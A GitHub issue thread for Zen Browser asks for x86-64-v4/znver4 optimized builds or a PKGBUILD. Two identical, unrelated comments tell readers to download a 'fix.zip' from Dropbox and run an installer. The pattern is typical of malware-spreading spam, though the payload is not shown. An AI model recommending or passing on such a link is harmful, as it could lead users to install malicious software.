### ISSUE TITLE
AVX512 (x86-64-v4) or znver4 builds

### ISSUE THREAD

**Issue by d3-X-t3r** [zen-browser/desktop#711]
### What feature would you like to see?

Since one of the key features of Zen Browser is performance, I wanted to get a version specifically optimised for recent CPUs (x86-64-v4), but surprisingly there doesn't appear to be one. The current ["optimized" build](https://github.com/zen-browser/desktop/blob/main/docs/requirements.md#supported-cpus-for-optimized-builds-windows-and-linux) seems to target CPUs going all the way back to the _Haswell_ era, an architecture which is already **11 years old**. 

Targeting `x86-64-v4` or `znver4` microarchitectures would make more sense for an "optimized" build which would benefit users of more modern CPUs, especially for AMD users where AVX512 shines. After all, people who care about performance are more likely to use recent CPUs, so IMO it would make more sense to target a more recent microarchitecture.

If it's not feasible to provide a pre-complied binary, at least a PKGBUILD to build Zen Browser from source with `x86-64-v4` or `znver4` optimisations would be very much appreciated. I checked the AUR but unfortunately it seems like all the existing packages there [are binary builds](https://aur.archlinux.org/packages?O=0&SeB=nd&K=zen-browser&outdated=&SB=p&SO=d&PP=50&submit=Go) only.

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by mauro-balades** [comment]
This issue should be discussed further. You can view and continue the discussion here: https://github.com/zen-browser/desktop/discussions/750

 ~ This is an automatic operation to better enhancements requests organization.
